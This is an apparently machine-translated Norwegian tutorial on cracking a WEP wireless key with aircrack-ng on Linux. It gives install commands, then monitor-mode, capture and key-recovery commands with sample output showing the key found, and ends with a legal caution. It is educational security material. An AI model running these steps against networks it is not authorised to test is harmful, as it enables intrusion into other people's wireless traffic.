hvordan knekke en trådløs wep-nøkkel ved HJELP AV AIR Crack

denne artikkelen kort beskriver enkle trinn på hvordan å knekke en trådløs wep-nøkkel ved hjelp av aircrack-ng programvare. Dette kan gjøres ved å snuse et trådløst nettverk, fange krypterte pakker og kjøre passende krypteringssprekkingsprogram i et forsøk på å dekryptere fangede data. WEP (Wired Equivalent Privacy) er ganske enkelt å knekke, da det bare bruker en nøkkel til å kryptere all trafikk.

grunnprinsippet er at kommunikasjon mellom to noder på nettverket er BASERT PÅ MAC-adressen. Hver vert mottar pakker bare ment FOR MAC-adressen til sitt eget grensesnitt. Det samme prinsippet gjelder også for trådløse nettverk. Men hvis en node setter sitt eget nettverkskort i promiskuøs modus, vil den også motta pakker som ikke er adressert for SIN EGEN MAC-adresse.

for å knekke wep-nøkkelen, må en hacker fange prøvepakker som ikke er ment for sitt eget nettverksgrensesnitt og kjøre crack-program for å sammenligne testnøkler mot WEP-nøkkel buntet med fangede pakker i forsøk på dekryptering. Nøkkelen som passer for å dekryptere fangede pakker, er nøkkelen som brukes av trådløst nettverk for å kryptere hele den trådløse kommunikasjonen med de tilkoblede stasjonene.

i de følgende avsnittene veileder vi deg gjennom aircrack-ng-installasjonen På Linux, og viser deg trinnvise instruksjoner for å knekke en trådløs wep-nøkkel. Guiden forutsetter at du har trådløst nettverkskort installert og at den støtter skjermmodus.

i denne opplæringen vil du lære:

  • slik installerer aircrack-ng på store Linux distros
  • hvordan knekke en trådløs wep-nøkkel ved hjelp aircrack-ng
hvordan knekke en trådløs wep-nøkkel ved hjelp av aircrack-ng

hvordan knekke en trådløs wep-nøkkel ved hjelp av aircrack-ng

Programvarekrav Og Linux Kommandolinjekonvensjoner
Kategori Krav, Konvensjoner Eller Programvareversjon Som Brukes
System Noen Linux distro
Programvare aircrack-ng
Annet Privilegert tilgang Til Linux-systemet ditt som rot eller via kommandoen sudo.
Konvensjoner # – krever at gitte linux-kommandoer kjøres med rotrettigheter enten direkte som rotbruker eller ved bruk av kommandoen sudo
$ – krever at gitte linux-kommandoer kjøres som en vanlig ikke-privilegert bruker

Installer aircrack – ng på store Linux distros

for å komme i gang trenger du aircrack-ng-programvaren installert på systemet ditt. Du kan bruke den riktige kommandoen nedenfor for å installere programmet med systemets pakkebehandling.

for å installere aircrack-ng På Ubuntu, Debian og Linux Mint:

$ sudo apt install aircrack-ng

for å installere aircrack-ng På CentOS, Fedora, AlmaLinux og Red Hat:

$ sudo dnf install aircrack-ng

slik installerer aircrack-ng På Arch Linux Og Manjaro:

$ sudo pacman -S aircrack-ng

Sprekk trådløs wep nøkkel

  1. først må vi identifisere navnet på vårt trådløse nettverksgrensesnitt. Hvis det trådløse nettverkskortet er riktig installert, vil en kommando iwconfig vise navnet på det trådløse nettverksgrensesnittet:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    utgangen viser at i vårt tilfelle er grensesnittnavnet wlan0.

  2. slå deretter på skjermmodus for det trådløse grensesnittet.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    resultatet av kommandoen vil gi deg navnet på det nye virtuelle grensesnittet. Det pleier å være mon0.

  3. Dump resultatene av skjermen til en terminal, slik at du kan se dem.
    # airodump-ng mon0

    Du kan se en tabell med data knyttet til trådløse nettverk i ditt område. Du trenger bare informasjon om nettverket du ønsker å knekke. Se etter DET, og merk BSSID og kanalen som den er på.

  4. deretter skal du logge resultatene av en skanning til en fil. Den fangstloggen vil Være nødvendig av Aircrack for å kjøre et brute force-angrep på nettverket senere. For å få fangst, skal du kjøre samme kommando som før, men du angir BSSID, kanal og loggplassering.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    Fyll ut din faktiske informasjon før du kjører kommandoen, og la den kjøre.

  5. som et siste skritt vi knekke wep-tasten ved hjelp av fanget pakker og aircrack-ng kommando. Alle fanget pakker er nå lagret i wep-crack-01.cap fil.
    # aircrack-ng -z wep-crack-01.cap

    utgangen din skal se slik ut:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
aircrack-ng forsøker å knekke wep-nøkkelen På Linux

aircrack-ng forsøker å knekke wep-nøkkelen På Linux

Lukke Tanker

i denne veiledningen så vi hvordan du installerer aircrack-ng På Linux og bruker programvaren til å knekke en trådløs wep-nøkkel. Husk at denne prosessen bare skal brukes til å teste din egen sikkerhet eller for utdanningsformål. Å bruke det på andres nettverk er ulovlig.

Leave a Reply

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert.